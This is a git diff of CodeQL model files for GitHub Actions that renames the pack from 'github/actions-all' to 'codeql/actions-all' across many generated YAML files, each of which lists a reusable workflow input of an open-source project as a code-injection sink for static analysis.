a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 92d91e541b90..5f90523e8335 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index ebf68ff3c126..9ffbce337f49 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 22f0fedcc07e..2182d445b831 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 23da361034c7..1928629382d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 19a5da19960b..59f7022fd895 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index abd0215aadad..f2e55b0dc5e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 5144d9ee2cb7..f92cfbba9c59 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 5a70ae48ec63..09318cf02bb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 81130d31fa38..48a3258e7a8a 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index f49f239ac9bf..cc8afde9d6a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 53be189b31ec..2960e471d2e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 2d6132a396fe..a4f095a23592 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0cb5e01e3aa9..cba130336692 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index cd3ca5d7c011..3fa02372683c 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index c8f1b93ef2d5..d31c7ee78044 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index 7877af9bbbf6..a270324f866d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 3d9b87166823..58dc1dd30af3 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index b14db181cce9..7255b0fa879a 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 6a883e369c02..b2aacde75df2 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 9612750345dc..4bc1aec46a25 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 2c6f4438846e..1309dc357a2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 109b1fefa7b9..a76e015ab89a 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 87f8bc706b6e..b9da0f85225b 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4c2f4e391b55..99e2d783c66b 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index e3e0a3460d47..cef0c9134aa7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index 01539c4329ba..6c9f45dbad01 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index d26e49d3ef88..40856fa46b38 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index f5b370e3d593..807229fc6b5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 72659e362711..df2220211b94 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index f37d70a718d6..7faea6b07ef1 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 3b4ed4b18b57..43018d43110d 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3dddb9bd3f9e..eaf9a48f30fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 49654eb84b87..b50566bcad6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index f46bcbee1b34..8bd7e837d38a 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index e3791339c035..7b76f842451e 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index f5f6c919cfbe..ee4636c6a2d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 4747cd57c4d7..5f1f9ea13ad3 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 3b68ca76fe2d..d2188efb8ee6 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 62b99c23ff64..ed86bf9266bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 84347b6cbfaf..79a253fe25e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 32a3d5061e27..f78830a9f9a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index d4ffc373678e..789cdc003be6 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 5a5d3999ca75..a2d7f77b2531 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 9983ea4eee2a..c3d0b1d87514 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8acf5f2c3cf..35aeca022bc0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index bd7494ab69a6..419d80970fab 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 89b60a4ac845..07841ba0a180 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 7c72cb57dca6..2501e39f850a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 2e9681cb21eb..2a1fd972192a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index d30f1bb7bba0..46568f16fa6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml 